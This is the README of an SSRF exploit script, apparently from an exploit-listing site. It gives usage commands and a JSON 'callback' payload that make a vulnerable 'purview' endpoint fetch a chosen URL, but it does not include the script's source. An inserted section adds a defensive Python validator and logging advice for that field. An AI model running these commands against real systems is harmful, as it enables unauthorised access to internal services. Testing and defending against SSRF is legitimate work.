## https://sploitus.com/exploit?id=D1821C57-9D8B-5E8D-92D8-1CF9328514A3
# SSRF Exploit Script

This repository contains a script designed to perform an SSRF (Server-Side Request Forgery) exploit for testing and educational purposes. **Use this tool responsibly and only in environments where you have explicit permission.**

## Features
- Exploit SSRF vulnerabilities in target systems.
- Validate input URLs to avoid misuse.
- Easy-to-use CLI with clear error messages and a help menu.

## Requirements
- `bash` (Unix shell)
- `jq` (JSON processor)
- `curl` (Command-line tool for HTTP requests)

## Usage

### Syntax
```bash
./script.sh --exploit <target_url> <purview_url>
```

### Options
| Option                | Description                                            |
|-----------------------|--------------------------------------------------------|
| `-h`, `--help`        | Show the help menu.                                    |
| `--exploit <tu> <pu>` | Perform the SSRF exploit with target and purview URLs. |

### Examples

#### Show Help Menu
```bash
./script.sh -h
```

Output:
```
Usage:
./script.sh --exploit <target_url> <purview_url>

Options:
-h, --help       - Show this help menu
--exploit <tu> <pu> - Perform the SSRF exploit with target and purview URLs
```

#### Perform SSRF Exploit
```bash
./script.sh --exploit http://example.com http://purview-url.com
```

Expected Output:
- If successful:
  ```
  SSRF exploit successful! Data retrieved:
  <response data>
  ```
- If unsuccessful:
  ```
  SSRF exploit failed! HTTP code: <code>
  ```

## Script Workflow
1. Parses the provided arguments.
2. Validates the provided URLs for correctness.
3. Sends an HTTP POST request to the `purview_url` with a JSON payload that carries the `target_url` in its `callback` field, attempting to exploit an SSRF vulnerability.
4. Prints the HTTP response or an error message based on the result.

## Example Workflow
### Input
```bash
./script.sh --exploit http://callback-url.com http://vulnerable-purview-url.com
```

### Payload Sent
```json
{
  "callback": "http://callback-url.com"
}
```
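
On the receiving side, the `callback` value in this payload is what has to be checked before the server makes any outbound request. The following is an added example, not code from this repository: a Python check for a body of that shape, where the allowlisted host name and the injectable `resolve` parameter are assumptions made for illustration.

```python
import ipaddress
import json
import socket
from urllib.parse import urlsplit

# Assumption: the only hosts this service may call back to (constructed name).
ALLOWED_HOSTS = {"hooks.partner.example"}


def system_resolver(host):
    """Default resolver: every address the name currently maps to."""
    return {info[4][0] for info in socket.getaddrinfo(host, 443)}


def check_callback(body, resolve=system_resolver):
    """Return (allowed, reason) for a body shaped like {"callback": "<url>"}."""
    try:
        url = json.loads(body)["callback"]
        if not isinstance(url, str):
            raise TypeError("callback must be a string")
        parts = urlsplit(url)
        host = (parts.hostname or "").lower().rstrip(".")
    except (ValueError, KeyError, TypeError):
        return False, "malformed body or URL"
    if parts.scheme != "https":
        return False, "scheme not allowed"
    if parts.username is not None or parts.password is not None:
        # "https://trusted-name@other-host/" is parsed with other-host as the host.
        return False, "userinfo in URL"
    if host not in ALLOWED_HOSTS:
        # Also rejects every IP literal, in any encoding: none is on the list.
        return False, "host not on allowlist"
    try:
        addrs = [ipaddress.ip_address(a) for a in resolve(host)]
    except (OSError, ValueError):
        return False, "resolution failed"
    # An allowlisted name must not point at loopback, private or link-local space.
    if not addrs or not all(a.is_global for a in addrs):
        return False, "resolves to non-public address"
    # The fetcher must connect to one of `addrs` and must not follow redirects;
    # a second DNS lookup or a 3xx response would bypass this check.
    return True, "ok"
```

Log the returned reason together with the requesting client, since repeated rejections on this field are a useful detection signal.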

### Response Handling
The HTTP response code and body are saved, and based on the status code, the success or failure of the exploit is determined.

## Error Handling
- If invalid or missing arguments are detected, the script provides detailed instructions via the help menu.
- If URLs are malformed, an error message is displayed, and the execution stops.

## Development Notes
This script is for testing purposes only. Misuse of this script can lead to severe legal consequences. Ensure compliance with all applicable laws and ethical standards.

## Contribution
Feel free to contribute by creating pull requests or reporting issues.

## License
[GNU GPL v3](LICENSE)

---

### Disclaimer
**This tool is intended for educational purposes and authorized penetration testing only.** The author is not responsible for any misuse or damage caused by this tool.